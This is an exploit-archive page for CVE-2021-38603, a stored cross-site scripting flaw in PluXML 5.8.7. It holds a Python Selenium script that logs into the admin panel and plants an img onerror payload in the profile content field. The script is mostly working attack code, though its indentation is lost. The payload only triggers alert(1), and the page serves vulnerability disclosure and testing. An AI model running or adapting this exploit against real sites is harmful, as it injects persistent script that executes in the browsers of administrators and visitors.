PluXML 5.8.7 Cross Site Scripting

PluXML 5.8.7 Cross Site Scripting: Posted Aug 13, 2021; Authored by nu11secur1ty; PluXML version 5.8.7 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2021-38603; SHA-256 | 54990585b9bccec56f64c839b836fe6765dc931c23ca4c89ce1a18c08f9938cc; Download | Favorite | View

PluXML 5.8.7 Cross Site Scripting

# Exploit Title: XSS-Stored on PluXML 5.8.7 - latest parameter "id_content"
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.13.2021
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-38603/pluxml-latest.zip
# CVE: CVE-2021-38603

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38603

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="
http://192.168.1.120/PluXml/core/admin/auth.php?p=/PluXml/core/admin/"

#enter your login username
username="nu11"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="login"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="blue"

browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_class_name(element_for_submit)
signInButton.click()

## Vulnerability parameter in profil.php "id_content"
## NOTE: The same problem is in the demo account in the online version
## https://www.softaculous.com/softaculous/demos/PluXml
time.sleep(3)
browser.maximize_window()
browser.get(("http://192.168.1.120/PluXml/core/admin/profil.php"))


## The Exploit
browser.execute_script("document.querySelector('[name=\"content\"]').value=\"</span><img
src=
https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif
<a href=http://example.com/> onerror=alert(1) /><span>\"")

## submit the exploit
browser.execute_script("document.querySelector('[name=\"profil\"]').click()")

# exit if you want :D
browser.close()

print("The payload for CVE CVE-2021-38603 is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")


----------------------------------------------------------------------------------------

# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38603
# Proof: https://streamable.com/5rf36u
# BR nu11secur1ty

Top Authors In Last 30 Days

Red Hat 226 files
Ubuntu 86 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,374)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,287)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,660)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

PluXML 5.8.7 Cross Site Scripting

PluXML 5.8.7 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PluXML 5.8.7 Cross Site Scripting

Share This

PluXML 5.8.7 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems